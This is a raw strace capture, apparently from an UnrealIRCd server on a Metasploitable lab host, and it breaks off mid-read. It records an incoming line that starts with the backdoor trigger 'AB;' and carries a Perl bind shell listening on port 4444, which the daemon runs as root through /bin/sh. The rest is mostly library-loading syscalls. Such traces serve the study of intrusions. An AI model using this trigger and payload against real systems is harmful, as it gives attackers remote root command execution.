4519  20:18:10.431420 select(1024, [2 3 4 7 9], [], NULL, {0, 470000}) = 1 (in [4], left {0, 310000})
4519  20:18:10.591352 clock_gettime(CLOCK_MONOTONIC, {48300, 408361369}) = 0
4519  20:18:10.591352 recv(4, "PRIVMSG  #testit0 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71
4519  20:18:10.591353 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591358 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591374 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591388 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591402 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591416 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591430 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591444 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591457 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591471 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591488 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591502 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591515 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591529 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591542 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591556 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591569 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591583 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.591596 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.592288 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.592348 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.592378 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:10.592406 time(NULL)        = 1495671490
4519  20:18:10.592423 time(NULL)        = 1495671490
4519  20:18:10.592439 gettimeofday({1495671490, 592443}, NULL) = 0
4519  20:18:10.592451 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:18:10.592481 clock_gettime(CLOCK_MONOTONIC, {48300, 409493804}) = 0
4519  20:18:10.592491 gettimeofday({1495671490, 592495}, NULL) = 0
4519  20:18:10.592502 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 300000})
4519  20:18:11.292211 clock_gettime(CLOCK_MONOTONIC, {48301, 109265925}) = 0
4519  20:18:11.292315 accept(2, 0, NULL) = 5
4519  20:18:11.292373 getpeername(5, {sa_family=AF_INET, sin_port=htons(37239), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:18:11.292425 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:18:11.292450 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:18:11.292472 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:18:11.292485 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:18:11.292496 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:18:11.292508 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:18:11.292520 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:18:11.292537 clock_gettime(CLOCK_MONOTONIC, {48301, 109551267}) = 0
4519  20:18:11.292550 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:18:11.292563 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:18:11.292572 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:18:11.292582 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:18:11.292592 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:18:11.292616 send(6, "\225\212\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:18:11.292716 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:18:11.292760 gettimeofday({1495671491, 292766}, NULL) = 0
4519  20:18:11.292776 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [7], left {1, 0})
4519  20:18:11.292834 clock_gettime(CLOCK_MONOTONIC, {48301, 109849689}) = 0
4519  20:18:11.292852 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70
4519  20:18:11.292968 recv(7, "PRIVMSG  #testit1 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:18:11.293016 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293098 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293142 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293219 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293235 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293250 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293264 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293292 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293306 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293320 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293333 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293360 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293374 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293388 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293416 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293431 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293445 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293460 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293489 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293503 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293517 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:11.293535 time(NULL)        = 1495671491
4519  20:18:11.293548 time(NULL)        = 1495671491
4519  20:18:11.293563 gettimeofday({1495671491, 293567}, NULL) = 0
4519  20:18:11.293576 select(1024, [2 6], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:18:11.293607 clock_gettime(CLOCK_MONOTONIC, {48301, 110621008}) = 0
4519  20:18:11.293619 gettimeofday({1495671491, 293623}, NULL) = 0
4519  20:18:11.293631 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})
4519  20:18:11.295559 clock_gettime(CLOCK_MONOTONIC, {48301, 112592008}) = 0
4519  20:18:11.295592 recvfrom(6, "\225\212\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\32\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:18:11.295636 close(6)          = 0
4519  20:18:11.295653 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:18:11.295667 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104
4519  20:18:11.295778 gettimeofday({1495671491, 295798}, NULL) = 0
4519  20:18:11.295807 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:18:11.295848 clock_gettime(CLOCK_MONOTONIC, {48301, 112861228}) = 0
4519  20:18:11.295860 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:18:11.295889 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:18:11.295911 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:18:11.295923 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:18:11.295938 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 11583
11583 20:18:11.296015 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
11583 20:18:11.296030 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
11583 20:18:11.296041 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11583 20:18:11.296054 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
11583 20:18:11.296167 brk(0)            = 0x80f9000
11583 20:18:11.296189 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.296206 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f01000
11583 20:18:11.296234 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.296278 open("/etc/ld.so.cache", O_RDONLY) = 1
11583 20:18:11.296308 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11583 20:18:11.296328 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef9000
11583 20:18:11.296338 close(1)          = 0
11583 20:18:11.296349 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.296365 open("/lib/libncurses.so.5", O_RDONLY) = 1
11583 20:18:11.296378 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
11583 20:18:11.296475 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
11583 20:18:11.296493 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec9000
11583 20:18:11.296505 mmap2(0xb7ef6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7ef6000
11583 20:18:11.296523 close(1)          = 0
11583 20:18:11.296535 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.296549 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11583 20:18:11.296564 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11583 20:18:11.296660 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11583 20:18:11.296678 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec5000
11583 20:18:11.296689 mmap2(0xb7ec7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ec7000
11583 20:18:11.296706 close(1)          = 0
11583 20:18:11.296728 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.296786 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
11583 20:18:11.296815 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
11583 20:18:11.296905 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
11583 20:18:11.296922 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ec4000
11583 20:18:11.296937 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d75000
11583 20:18:11.296948 mmap2(0xb7ebe000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ebe000
11583 20:18:11.296963 mmap2(0xb7ec1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec1000
11583 20:18:11.296978 close(1)          = 0
11583 20:18:11.297001 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d74000
11583 20:18:11.297013 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d746b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
11583 20:18:11.297070 mprotect(0xb7ebe000, 4096, PROT_READ) = 0
11583 20:18:11.297109 munmap(0xb7ef9000, 29913) = 0
11583 20:18:11.297139 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11583 20:18:11.297153 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
11583 20:18:11.297172 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa11bd0) = -1 ENOTTY (Inappropriate ioctl for device)
11583 20:18:11.297204 brk(0)            = 0x80f9000
11583 20:18:11.297221 brk(0x80fa000)    = 0x80fa000
11583 20:18:11.297261 brk(0x80fb000)    = 0x80fb000
11583 20:18:11.297279 getuid32()        = 0
11583 20:18:11.297302 getgid32()        = 0
11583 20:18:11.297312 geteuid32()       = 0
11583 20:18:11.297321 getegid32()       = 0
11583 20:18:11.297335 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11583 20:18:11.297349 time(NULL)        = 1495671491
11583 20:18:11.297362 brk(0x80fc000)    = 0x80fc000
11583 20:18:11.297378 brk(0x80fd000)    = 0x80fd000
11583 20:18:11.297397 open("/proc/meminfo", O_RDONLY) = 1
11583 20:18:11.297419 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
11583 20:18:11.297438 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f00000
11583 20:18:11.297450 read(1, "MemTotal:      1035240 kB\nMemFree:        167620 kB\nBuffers:        141380 kB\nCached:         482912 kB\nSwapCached:          0 kB\nActive:         505944 kB\nInactive:       307220 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        167372 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            1128 kB\nWriteback:           0 kB\nAnonPages:      188860 kB\nMapped:          52056 kB\nSlab:            32580 kB\nSReclaimable:    20164 kB\nSUnreclaim:      12416 kB\nPageTables:       2908 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707968 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
11583 20:18:11.297541 close(1)          = 0
11583 20:18:11.297552 munmap(0xb7f00000, 4096) = 0
11583 20:18:11.297565 brk(0x80fe000)    = 0x80fe000
11583 20:18:11.297591 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11583 20:18:11.297604 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11583 20:18:11.297617 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11583 20:18:11.297629 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11583 20:18:11.297641 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
11583 20:18:11.297653 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
11583 20:18:11.297667 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11583 20:18:11.297678 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11583 20:18:11.297692 uname({sys="Linux", node="metasploitable", ...}) = 0
11583 20:18:11.297784 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
11583 20:18:11.297804 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11583 20:18:11.297836 brk(0x8100000)    = 0x8100000
11583 20:18:11.297850 getcwd("/etc/unreal", 4096) = 12
11583 20:18:11.297864 getpid()          = 11583
11583 20:18:11.297881 getppid()         = 4519
11583 20:18:11.297898 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11583 20:18:11.297918 stat64("/sbin/sh", 0xbfa11ba8) = -1 ENOENT (No such file or directory)
11583 20:18:11.297930 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11583 20:18:11.297948 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11583 20:18:11.297972 socket(PF_FILE, SOCK_STREAM, 0) = 1
11583 20:18:11.297986 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11583 20:18:11.297998 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11583 20:18:11.298019 close(1)          = 0
11583 20:18:11.298031 socket(PF_FILE, SOCK_STREAM, 0) = 1
11583 20:18:11.298041 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11583 20:18:11.298052 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11583 20:18:11.298070 close(1)          = 0
11583 20:18:11.298084 open("/etc/nsswitch.conf", O_RDONLY) = 1
11583 20:18:11.298099 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
11583 20:18:11.298115 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f00000
11583 20:18:11.298127 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
11583 20:18:11.298181 read(1, "", 4096) = 0
11583 20:18:11.298194 close(1)          = 0
11583 20:18:11.298239 munmap(0xb7f00000, 4096) = 0
11583 20:18:11.298273 open("/etc/ld.so.cache", O_RDONLY) = 1
11583 20:18:11.298286 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11583 20:18:11.298303 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef9000
11583 20:18:11.298314 close(1)          = 0
11583 20:18:11.298325 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.298354 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
11583 20:18:11.298369 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 